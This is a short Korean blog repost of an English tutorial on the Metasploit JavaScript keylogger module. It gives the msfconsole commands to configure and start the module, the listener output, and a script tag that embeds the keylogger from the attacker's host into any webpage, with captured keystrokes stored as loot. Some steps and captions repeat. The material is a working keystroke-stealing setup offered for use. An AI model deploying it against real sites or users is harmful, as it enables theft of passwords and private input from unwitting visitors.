metasploit http javascript keylogger 모듈
웹/공격 2012. 2. 23. 10:10 |http://r00tsec.blogspot.com/2012/02/keylogging-with-metasploit-javascript.html
If you want the detail, please go to the Source.
Step 1: Module setup:
Step 2: Demo page URL
Step 3 (Optional) : To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with "/[whatever].js".
Screen Capture 1: Module setup and run
Screen Capture 2: Demo page
Screen Capture 3: Keystrokes captured and stored to loot
If you want the detail, please go to the Source.
Step 1: Module setup:
msf > use auxiliary/server/capture/http_javascript_keylogger msf auxiliary(http_javascript_keylogger) > set demo true demo => true msf auxiliary(http_javascript_keylogger) > show options Module options (auxiliary/server/capture/http_javascript_keylogger): Name Current Setting Required Description ---- --------------- -------- ----------- DEMO true yes Creates HTML for demo purposes SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) msf auxiliary(http_javascript_keylogger) > run [*] Using URL: http://0.0.0.0:8080/qZBRzd [*] Local IP: http://192.168.1.131:8080/qZBRzd [*] Server started.
Step 3 (Optional) : To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with "/[whatever].js".
<script type="text/javascript" src="http://192.168.1.131:8080/qZBRzd/test.js">
Screen Capture 2: Demo page
Screen Capture 3: Keystrokes captured and stored to loot
